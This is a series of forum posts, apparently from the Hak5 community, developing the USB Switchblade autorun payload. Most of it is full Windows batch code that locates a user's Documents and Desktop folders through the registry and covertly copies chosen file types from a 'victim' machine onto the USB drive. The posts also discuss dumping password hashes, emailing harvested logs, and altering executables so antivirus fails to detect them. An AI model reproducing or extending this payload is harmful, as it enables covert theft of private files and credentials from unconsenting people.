DMilton
-
Posts
132 -
Joined
-
Last visited
Everything posted by DMilton
-
It's not a flaw, if you read about how to prevent this kind of attacks, you'll notice than one of the firsts actions to do is disabling the auto-run... It can ever be run with a simply double-click... Issue resolved. :P
-
I had a headache with this... 1.- Check if autorun is enabled in this other PC that doesn't go. 2.- Try to auto-execute go.vbs by double clicking it from your \SYSTEM dir. It'll surely will create the logs correctly if they're enabled. EDIT: For checking state of auto-play you can run... gepedit.msc, go to "Computer Configuration", "Administrative Templates", "System", double click on "Turn off Autoplay" and check the state of autoplaying... If you change this value, you must to run... gpupdate
-
Then you have your Safey test checking enabled... I expected this, but... ;) Sorry, you are using U3 version... in the U3 version, the start.bat is in the CD partition. Then you have to update the CD partition with the new start.bat, modifying the U3.iso file (by actualizing the start.bat) and using the customizer again. But I still don't know why it doen't work for you... Sorry...
-
You can press SHIFT when you insert your USB drive, then autorun will not work for you. Also you can add this to the beggining of the payload to avoid the payload runs in your computer or computers... Edit the \SYSTEM\Start.bat from your USB pocketnife. @ECHO off CD SYSTEM >NUL :: Finds the location of the flash partition and sets master variable. IF EXIST z:\CONFIG\Drive_Location.cfg SET flshdrv=z: Add this simple code: @ECHO off if %computername% == 'YOURCOMPUTERNAME' goto End if %computername% == 'YOUR2NDCOMPUTERNAME' goto End if %computername% == 'YOUR3RDCOMPUTERNAME' goto End CD SYSTEM >NUL :: Finds the location of the flash partition and sets master variable. IF EXIST z:\CONFIG\Drive_Location.cfg SET flshdrv=z: Do it by adding as much computer names as you own. Obviously, substitute 'YOURCOMPUTERNAME' with your REAL computer name. You can know it by opening a cmd session and typing ECHO %COMPUTERNAME% One more question... Is safety.txt as you spell it in lowercase? The payload checks for this: Safety.txt, and I don't know if VISTA consider safety.txt and Safety.txt as different filenames (Win 2000 and XP doen't)... Check it too. Let's see it! If you need some other help... (And I can help you)...
-
You can see how the files are enabled by looking the batch but i'll try to show you (mencargo does). The script looks for the existence of some files (IF EXIST %config%\Slurp3.cfg GOTO SetSlurpVars ELSE GOTO SkipSlurpVars). The actual on/off option is a check of existing files in the %config% directory, being on with files as: "Slurp3.cfg" or off with files as "_Slurp3.cfg". Actually, the batch renames the files using this on/off checking. Other files, as those used for emailing are used to set up some variables as Haksaw.cfg does, setting up this variables: SET emailfrom=YOUR_EMAIL_HERE@gmail.com SET emailto=YOUR_EMAIL_HERE@gmail.com SET password=YOUR_PASSWORD_HERE In last version of Leapo's you can do it by saving up to 3 profiles... You can do so, but I have one question on it. Is not better to contributing in one proyect than developing one proyect each one of us? I think team working would be the best, despite it's difficult to do... If you have some new adds planned, you can share them by editting the wiki unless you don't want to do (I'm sure is not the case), then everybody can use it in their own payloads. Those passwords you see at clear text are some of them stored in RegKeys and uses some yet developedNirsoft utilities. The errors in the code mainly responds in allocating variables for paths that in English would work but in other installation languages or non-standard paths installations may not work. If this is your case (didn't you tell you're not english? ;) ), you can help in reformatting the code by using Reliable Paths Method for fixing all the unstable variables (or other method you think better)... I don't know but you can develop the non-usb payload and when finished, updating the U3 payload... Sorry, no one is ignoring yo, but I don't know why with Safety.txt on the main HDD, the payload runs for you... If you have enabled in the payload the cheking of Safety.txt, it would work... Try this with the menu.bat 1 Manage Settings and Modules 3 Other Options 3 Perfom Safety.txt check (it must be enabled) The payload looks if "_Safety_Check.cfg" is in the CONFIG directory of your drive, if found then there will not be a safety check. Instead if the payload finds "Safety_check.cfg" in the CONFIG directory, will perform the checking of the Safety.txt in your C:\ and will work for you. Check this for yourself in your CONFIG directory of your USB and tell us what you found there, the "_Safety_Check.cfg" or "Safety_check.cfg" file...
-
The one we need (really it isn't needed but very useful) is a GUI (better a open source GUI for all understanding of how to do it) with basically enabling/disabling options for all the payload's stuff. There is a very good GUI from GonZor that made it, but he is not actualizing his payload and nowadays Leapo's comes with more stuff. Anyway there's many people trying to improve this Leapo's payload. You can see what GonZor's does to understand what is needed, I think is a very good and easy using GUI. Actually the payload runs basically by looking at \CONFIG directory to see for the state of multitude (near of 40) files. That is, if a file is found, the payload runs a piece of code, if isn't it omittes the pice of code. Doing a GUI can clear the code too, not using so much configuration files, but only a few. Once the GUI is started, the needs is to change this few files (or parameters) for being used by start.bat (the payload itself) file, allowing the user selecting what will run or not in the next use of the payload. This Leapo's has a GUI itself but it has been made in dos-shell (menu.bat). Is good but a windows way GUI will be better.
-
Don't worry, you are not the only one than doesn't speak english (I'm spanish). If I can understand you (my english is poorer than yours), everybody can do it! ;) You're wellcome. I agree :P Do you mean using only one config file for all the stuff? As using a general config file? Will this reduce the payload time consumption? No passwords are broken during function of the payload... It only extracts the hashes for further work at our own computer. I think it'll be less suspicious too... ;) I think the best way for publishing it is to publish at here! It's an easy way to help and to let others developing it. :o I think Leapo was working on it but I don't know what's his actual progression on it... Good work, We'll be waiting for your work on this and of course, your contributions cleaning the code, developing new stuff, doing it faster, programming a GUI or what you want... :X3N All contributions are good contributions! :alexthedrifter I think so... :P
-
Then will be waiting for X3N response! I have many things on mind, one of them is making a GUI too, but the problem is the time... When I finish some new stuff I am working on this payload, I'll study the idea of helping with a GUI... Now you know more than me on Ruby! That was you "Hello world!" button! :P
-
I think it's a VERY, VERY GOOD idea. I will be waiting for it while doing other things I have in mind... ;) Have you readed X3N posts about a GUI in AutoIT? You can do it at http://hak5.org/forums/index.php?act=findp...&pid=101889 X3N: How far have you got with it? Are you going to publish the code for the GUI?
-
I have been working in integrating some of the code of last days (Slurp3 and Recovery Paths Method) into Leapo's payload. (For copying and pasting) into Start.bat. We must create a txt file called wanted.txt in the CONFIG directory of our USB. A file called Slurp3.cfg must be created in CONFIG diretory of our USB. The contents of the wanted.txt file can be, for example (one line for each extension): *.txt *.doc *.xls *.xml *.jpg Once the wanted.txt file has been created or moddified, just run next code. It surely recover the wanted paths for your Slurp3 desired files (From My Documents, Desktop, Shared Documents and Shared Desktop or any other non-default directories). :: By DMilton for free community :: Oriented Slurping Method using Recovery Paths Method :: Thread http://hak5.org/forums/index.php?showtopic=6746 :: Checks the state of Slurp3.cfg :: Set some variables needed (must be added to initial variables settings). :: Note: the ActuaUser, Common and TmpReg (Exported Reg Branches and temporary file) have been routed to %temp% path for doing the batch going faster. echo off set ActualUser="%temp%\ActualUser.dat" set Common="%temp%\Common.dat" set TmpReg=%temp%\tmpval.dat set SlurpDir=%logdir%\Slurp_Data set Wanted=%config:"=%wanted.txt set /A ValCounter=1 :: Next lines can be added by example after the variables declaration ::Erases temporal files if exists if exist %ActualUser% del /S /F /Q /A:- %ActualUser% if exist %Common% del /S /F /Q /A:- %Common% if exist %TmpReg% del /s /F /Q /A:- %TmpReg% :: Exporting keys :: It will help to Slurp2 and Slurp3 configuration, then will be a previous comprobation IF EXIST %config%\Slurp2.cfg GOTO SetSlurpVars IF EXIST %config%\Slurp3.cfg GOTO SetSlurpVars GOTO SkipSlurpVars :SetSlurpVars REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %Common% REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %ActualUser% if not %errorlevel%==0 goto error :: Creating a temp file containing the desired data type %ActualUser% | find "Personal" >> %TmpReg% type %ActualUser% | find "Desktop" >> %TmpReg% type %Common% | find "Common Documents">> %TmpReg% type %Common% | find "Common Desktop">> %TmpReg% :: Extracts the necessary lines from tmpval.dat for a further cleaning FOR /F "tokens=2* delims==" %%I IN (%TmpReg%) DO set var="%%I" if "%var%"=="" goto ErrSetVars FOR /F "tokens=2* delims==" %%I IN (%TmpReg%) DO ( call:FOUND %%I ) :: Deleting temporal files del /S /F /Q /A:- %ActualUser% del /S /F /Q /A:- %Common% del /S /F /Q /A:- %TmpReg% goto :Continue :FOUND :: This routine is called from the extraction keys arguments :: It cleans of the path and sets a temp RegKey variable SET PP="%~1" SET PP=%PP:\\=\% SET PP=%PP:"=% SET RegKey=%PP% :: Assigning variables using ValCounting (counter) and RegKey IF %ValCounter%==1 SET MyD=%RegKey% IF %ValCounter%==2 SET Dsk=%RegKey% IF %ValCounter%==3 SET ShDoc=%RegKey% IF %ValCounter%==4 SET ShDsk=%RegKey% set /A ValCounter=ValCounter+1 :ErrSetVars :: Causes a break in the code and continues... GOTO :EOF :Continue :: In order to integrate this stuff into Leapo's, the next lines must be added after ":SkipSlurp2" IF NOT EXIST %config%\Slurp3.cfg GOTO SkipSlurp3 :StartSlurp3 :: Creates the directory structure for the wanted files option if not exists :: Is usefull too for simpilify Slurp2 routine (not done now). :: The directories structure will be created as original, for doing so, we must to extract the routes to four variables (We will call them DestMyd, DestDsk, DestShDsk and DestShDoc) :ForMyD :: This will extract end text of ":..\..\..\..\Name of my Documents folder" (for a depth of 9 sub-directories, I think no more is needed) and return the "Name of my Documents folder" for using it in a variable (DestMyD) used before for creating the same destination folder for "My Documents" or any one other given. :: I don't know if this can be done easier (with no so much code), if you can improve it (sure)... please do it! :: Of course, another way of creating the destination folders is simply doing so without extracting original ones and calling them simply "My Documents", "Desktop", etc... But I think is a good thing to have them slurped as in original folder structure. FOR /F "tokens=1,2,3,4,5,6,7,8* delims=\" %%i IN ("%MyD%") DO ( SET path1=%%j SET path2=%%k SET path3=%%l SET path4=%%m SET path5=%%n SET path6=%%o SET path7=%%p SET path8=%%q ) IF "%path1%"=="" SET DestMyD=%USERNAME%_%path1% && goto :ForDsk IF "%path2%"=="" SET DestMyD=%USERNAME%_%path1% && goto :ForDsk IF "%path3%"=="" SET DestMyD=%USERNAME%_%path2% && goto :ForDsk IF "%path4%"=="" SET DestMyD=%USERNAME%_%path3% && goto :ForDsk IF "%path5%"=="" SET DestMyD=%USERNAME%_%path4% && goto :ForDsk IF "%path6%"=="" SET DestMyD=%USERNAME%_%path5% && goto :ForDsk IF "%path7%"=="" SET DestMyD=%USERNAME%_%path6% && goto :ForDsk IF "%path8%"=="" SET DestMyD=%USERNAME%_%path7% && goto :ForDsk :ForDsk :: We do the same for "Desktop" directory, etc... FOR /F "tokens=1,2,3,4,5,6,7,8* delims=\" %%i IN ("%Dsk%") DO ( SET path1=%%j SET path2=%%k SET path3=%%l SET path4=%%m SET path5=%%n SET path6=%%o SET path7=%%p SET path8=%%q ) IF "%path1%"=="" SET DestDsk=%USERNAME%_%path1% && goto :ForShDsk IF "%path2%"=="" SET DestDsk=%USERNAME%_%path1% && goto :ForShDsk IF "%path3%"=="" SET DestDsk=%USERNAME%_%path2% && goto :ForShDsk IF "%path4%"=="" SET DestDsk=%USERNAME%_%path3% && goto :ForShDsk IF "%path5%"=="" SET DestDsk=%USERNAME%_%path4% && goto :ForShDsk IF "%path6%"=="" SET DestDsk=%USERNAME%_%path5% && goto :ForShDsk IF "%path7%"=="" SET DestDsk=%USERNAME%_%path6% && goto :ForShDsk IF "%path8%"=="" SET DestDsk=%USERNAME%_%path7% && goto :ForShDsk :ForShDsk FOR /F "tokens=1,2,3,4,5,6,7,8* delims=\" %%i IN ("%ShDsk%") DO ( SET path1=%%j SET path2=%%k SET path3=%%l SET path4=%%m SET path5=%%n SET path6=%%o SET path7=%%p SET path8=%%q ) IF "%path1%"=="" SET DestShDsk=AllUsers_%path1% && goto :ForShDoc IF "%path2%"=="" SET DestShDsk=AllUsers_%path1% && goto :ForShDoc IF "%path3%"=="" SET DestShDsk=AllUsers_%path2% && goto :ForShDoc IF "%path4%"=="" SET DestShDsk=AllUsers_%path3% && goto :ForShDoc IF "%path5%"=="" SET DestShDsk=AllUsers_%path4% && goto :ForShDoc IF "%path6%"=="" SET DestShDsk=AllUsers_%path5% && goto :ForShDoc IF "%path7%"=="" SET DestShDsk=AllUsers_%path6% && goto :ForShDoc IF "%path8%"=="" SET DestShDsk=AllUsers_%path7% && goto :ForShDoc :ForShDoc FOR /F "tokens=1,2,3,4,5,6,7,8* delims=\" %%i IN ("%ShDoc%") DO ( SET path1=%%j SET path2=%%k SET path3=%%l SET path4=%%m SET path5=%%n SET path6=%%o SET path7=%%p SET path8=%%q ) IF "%path1%"=="" SET DestShDoc=AllUsers_%path1% && goto :CreateFolders IF "%path2%"=="" SET DestShDoc=AllUsers_%path1% && goto :CreateFolders IF "%path3%"=="" SET DestShDoc=AllUsers_%path2% && goto :CreateFolders IF "%path4%"=="" SET DestShDoc=AllUsers_%path3% && goto :CreateFolders IF "%path5%"=="" SET DestShDoc=AllUsers_%path4% && goto :CreateFolders IF "%path6%"=="" SET DestShDoc=AllUsers_%path5% && goto :CreateFolders IF "%path7%"=="" SET DestShDoc=AllUsers_%path6% && goto :CreateFolders IF "%path8%"=="" SET DestShDoc=AllUsers_%path7% && goto :CreateFolders :CreateFolders IF NOT EXIST "%SlurpDir%\%DestMyD%" mkdir "%SlurpDir%\%DestMyD%" IF NOT EXIST "%SlurpDir%\%DestDsk%" mkdir "%SlurpDir%\%DestDsk%" IF NOT EXIST "%SlurpDir%\%DestShDsk%" mkdir "%SlurpDir%\%DestShDsk%" IF NOT EXIST "%SlurpDir%\%DestShDoc%" mkdir "%SlurpDir%\%DestShDoc%" :: Copying the desired files with the same structure than original for /F %%a in (%wanted%) do ( xcopy "%MyD%\%%a" "%SlurpDir%\%DestMyD%" /H /S /D /C xcopy "%Dsk%\%%a" "%SlurpDir%\%DestDsk%" /H /S /D /C xcopy "%Dsk%\%%a" "%SlurpDir%\%DestShDsk%" /H /S /D /C xcopy "%ShDoc%\%%a" "%SlurpDir%\%DestShDoc%" /H /S /D /C ) ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Wanted files were copied] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 :SkipSlurp3 For an independent batch (or for a proof of concept of this code), the only you need is declaring config and logdir variables at the beginning of the batch. You can do it with copying and pasting the code to a batch (name it as you want) and adding this two variables to the beggining of it: set config="[your usb letter]:\CONFIG\" SET logdir=[your usb letter]:\SLURP3 Note that in original Leapo's payload, both variables are declared. In Leapo's the logdir is between brackets, it probablily will cause some minor bugs, I have tested only the "Proof of Concept" batch. What about integrating this on next version, Leapo? ;)
-
That was a good implementation, only a little IF is all it was needed!. I vote for updatting the Payload! Fantastic, thanks a lot!
-
Mirror it where you want, mirrors ever helps...
-
I have been adding to the wiki this way of assign variables for further slurping actions and called it Reliable Paths Method.
-
I think if you have something usefull, you must to share it. Is the best way for learning... ;) It'll be a good help....
-
Meanwhile Leapo is working, let's try going further! ;) Because of my maniatical obsession of making this payload (and any other) to run in any language installation , I have done a batch that assigns variables to some paths. Besides, the batch can clean and improve on some variables from the original Leapo's payload that woudn't work in next cases: :( The user is very "smart" and he thought: If I change my by-default systems paths, they won't be able to slurp any of my information!!! The system language we want to slurp from is some other, for example: Chinese or Spanish (1st and 2nd languages spoken in the world...), of course English too! The script basically gets some registy value keys and assign variables for the next paths (even if they have been modified): ;) MyD for Current User "My Documents" path Dsk for Current User "Desktop" path ShMyD for Shared "My Documents" for All Users path ShDoc for Shared "Desktop" for All Users path Leapo: if you are interested in integrating it in your payload, I think It'll be a good way to standarize the payload. Anyway, is useful in Slurp2 and Slurp3. If you want, I can modify your payload with this stuff and the other posted by me before and post the final code . It can be useful too for slurping non-by-default installation paths for any program by exporting KeyReg values, consulting them and setting the correct variables up. Tested in Windows 2000 and Windows XP, English and Spanish versions. The script takes about a second or less in assigning the variables. <_< @echo off :: Paths Finder :: By DMilton for free community :: Thread http://hak5.org/forums/index.php?showtopic=6746 :: This batch writes variables for using sure paths for My Document, Desktop, My Shared Documents and My Shared Desktop :: Creating a set of variables for temp data set ActualUser=".\ActualUser.dat" set Common=".\Common.dat" set TmpReg=".\tmpval.dat" set /A ValCounter=1 ::Erases temporal files if needed if exist %ActualUser% del /S /F /Q /A:- %ActualUser% if exist %Common% del /S /F /Q /A:- %Common% if exist %TmpReg% del /s /F /Q /A:- %TmpReg% :: Exporting keys REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %Common% REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %ActualUser% if not %errorlevel%==0 goto error :: Creating a temp file containing the desired data type %ActualUser% | find "Personal" >> %TmpReg% type %ActualUser% | find "Desktop" >> %TmpReg% type %Common% | find "Common Documents">> %TmpReg% type %Common% | find "Common Desktop">> %TmpReg% :: Extracts the necessary lines from tmpval.dat for a fruther cleaning FOR /F "tokens=2* delims==" %%I IN (.\tmpval.dat) DO set var="%%I" if "%var%"=="" goto error FOR /F "tokens=2* delims==" %%I IN (.\tmpval.dat) DO ( call:FOUND %%I ) :: Deleting temporal files del /S /F /Q /A:- %ActualUser% del /S /F /Q /A:- %Common% del /S /F /Q /A:- %TmpReg% goto :CONTINUE :FOUND :: Cleaning of the path and setting temp ReyKey variable SET PP="%~1" SET PP=%PP:\\=\% SET PP=%PP:"=% SET RegKey=%PP% :: Assigning variables using ValCounting (counter) and RegKey IF %ValCounter%==1 SET MyD=%RegKey% IF %ValCounter%==2 SET Dsk=%RegKey% IF %ValCounter%==3 SET ShDoc=%RegKey% IF %ValCounter%==4 SET ShDsk=%RegKey% set /A ValCounter=ValCounter+1 :error :: Error???? This stuff goes perfectly!! GOTO :EOF :CONTINUE :: Here you can do what you want with the MyD, Dsk, ShDoc and ShDsk variables I hope it helps! I'll integrate the same almost for MSN Messenger paths in next days. Any comments? If someone want's a proof of concept, I'll be glad of doing it.
-
Try looking for sbowne post. In his web, he explains in a collection of docs many things about hacking, the solution is possible in there... The link to his web is: http://samsclass.info/124/124_F08.html#projects and a good doc-link for installing this Leapo's payload is: http://samsclass.info/124/proj2/p14_USB_Switchblade.doc
-
Maybe it's offtopic, buttttt I did it because I was answering different posts from different people meanwile I was reading them, the probably wrong concept to me is "one post, one answer", it's a simply way of organizating things. No other reason was in it, I don´t pretend to fill out the forum, not to be "The One", only "one more"... I'll take your piece of advice in future although I don´t understand what's the matter with it! Thanks a lot and excuse me if I did it in a wrong way... You see? I can practise now with it... It's a common problem. Probably the port it's closed. I'm not sure but is a solution to do an inverse VNC connection???
-
The fact is recicling!
-
:P I know but now, we have to work on this allusers.txt file to extract the variables to the payload... I'm not plenty of time and I'm working on the other stuff :( , if wanted! When I have some time, i'll go with this but I think it's a good way to have all the interesting docs in our hands... :o Of course, this is only for pen-tests, developers and administrative issues (as for a security backup of your own system), don't do it without knowledge of the owner of the system. Don't compromise any system without permission or you will be pursued by law enforcements. <_<
-
Don't worry, probably I didn't comment the script too much. ;) Modified comments to the script in the post. If you have observed more issues, please, tell us for solving them.
-
I'm waiting for Leapo's answer and I hope there will be useful for this payload. I haven't incorporated the script to the u3 to test it because of time but with a little few moddifications it can run from a batch itself.
-
It will be very interesting, a good idea but, as Jen said, there's some antivirus very difficult to kill because they run various processes at time and detect when a process is shutdown, then, the living process starts up the dead process again. The solution may be killing all the processes at a time but I don´t know why, the list of processes starts again in a few seconds in some av. Other viable solution is to modify the detected exes with changing their signatures for bypass the av scan (I did it with OlyDbg), but it must be done by the end user not by Leapo, because if you publish the new exes will detected as a variant of the original in a few days... I did it but I will not publish them (for obvious reasons). ;)
-
Is someone thinking about a way for recoverying not only actual user account docs but ALL USERS ACCOUNTS? I have some ideas planning on how to do this but I'll have to squish my tiny and poor brain a bit...
-
If someone can test it, it would be great! By the way I'm planning and working on (if you consider it usefull) coding a way for: 1.- Implement an slurp option to xcopy a concrete directory/s or file/s given by the user. Yes, I know it's easy, but it's very late and I have to sleep a bit. 2.- Improve the entire payload by using stored REG keys values for installed apps paths. This will made the payload to avoid using fix path variables (for those who change the default paths) and to avoid to make an OS language detection.
-
My mind is bussy, then... here it is something I have working on. Whe can slurp the data with Slurp2 configuration, but what about slurping certain type of files in the default victim's hdd? I think is a very good implementation to allow the user to slurp only certain file types as doc, xlm, xls, txt, jpg, etc. This could be a very good option between Slurp1 (only a few files) and Slurp2 (all the files), depending of the contents we want to slurp, the time we have to do this and the space avaiable in our USB hacking drive. For this purpose, I've done the next code to slurp the desired data contained in My Documents, Desktop, Shared Desktop and Shared Documents folders. It can be called from the batch looking for the Slurp3.cfg file (Leapo will need to add a menu item for this purpose). :P Whe can do the attack edditing a plain text file and adding the information whe want to slurp with adding as much lines as file types we want to slurp. In the example, the txt file must be eddited in the CONFIG directory of our USB and must be called wanted.txt. *.txt *.doc *.xls *.xml *.jpg This example will copy all the files with these extensions to the slurp directory. Also I and added a simply way for the OS language detection and made some improvements in the variables respect the paths for clearing a bit the batch and allow the batch run correctly in other language installation (Spanish by the momment) The commented batch is the next: :: By DMilton for free community :: Thread http://hak5.org/forums/index.php?showtopic=6746 :: Checks the state of Slurp3.cfg IF NOT EXIST %config%\Slurp3.cfg GOTO SkipSlurp3 ::Starts an OS language detection for configuring paths (maybe this could be added to set the initial variables), also it can clean the code too...:). Other languages are very simply to implement too. :: Detection of ENGLISH OS IF EXIST "%HOMEDRIVE%%HOMEPATH%\My Documents\" ( set MyD=My Documents set Dsk=Desktop set ShDsk=Shared Desktop set ShDoc=Shared Documents set MSN=My Received Files echo The Operating System language is ENGLISH>> %log% 2>&1 ) :: Detection of SPANISH OS (After chinese, the second used language in the world);) IF EXIST "%HOMEDRIVE%%HOMEPATH%\Mis Documentos\" ( set MyD=Mis Documentos set Dsk=Escritorio set ShDsk=Escritorio Compartido set ShDoc=Documentos Compartidos set MSN=Mis Archivos Recibidos echo The Operating System language is SPANISH>> %log% 2>&1 ) :: Sets other variables and paths to clean up pathnams later on set SlurpDir=%logdir%\Slurp_Data set Wanted=%config%\wanted.txt :: Creates the directory structure for the wanted doc option if not exists IF NOT EXIST "%SlurpDir%\%MyD%\" mkdir "%SlurpDir%\%MyD%\" IF NOT EXIST "%SlurpDir%\%Dsk%\" mkdir "%SlurpDir%\%Dsk%\" IF NOT EXIST "%SlurpDir%\%ShDsk%\" mkdir "%SlurpDir%\%ShDsk%\" IF NOT EXIST "%SlurpDir%\%ShDoc%\" mkdir "%SlurpDir%\%ShDoc%\" IF NOT EXIST "%SlurpDir%\%MSN%\" mkdir "%SlurpDir%\%MSN%\" :: Copying the files with the same structure than original looking for extensions at wanted.txt file for /F %%a in (%wanted%) do ( xcopy "%HOMEDRIVE%%HOMEPATH%\%MyD%\%%a" "%SlurpDir%\%MyD%\" /H /S /D /C xcopy "%HOMEDRIVE%%HOMEPATH%\%Dsk%\%%a" "%SlurpDir%\%Dsk%\" /H /S /D /C xcopy "%ALLUSERSPROFILE%\%Dsk%\%%a" "%SlurpDir%\%ShDsk%\" /H /S /D /C xcopy "%ALLUSERSPROFILE%\%ShDoc%\%%a" "%SlurpDir%\%ShDoc%\" /H /S /D /C xcopy "%HOMEDRIVE%%HOMEPATH%\%MSN%\%%a" "%SlurpDir%\%MSN%\" /H /S /D /C ) ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Wanted files were copied] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 pause :SkipSlurp3 This was my little contribution to this proyect, I hope it helps!
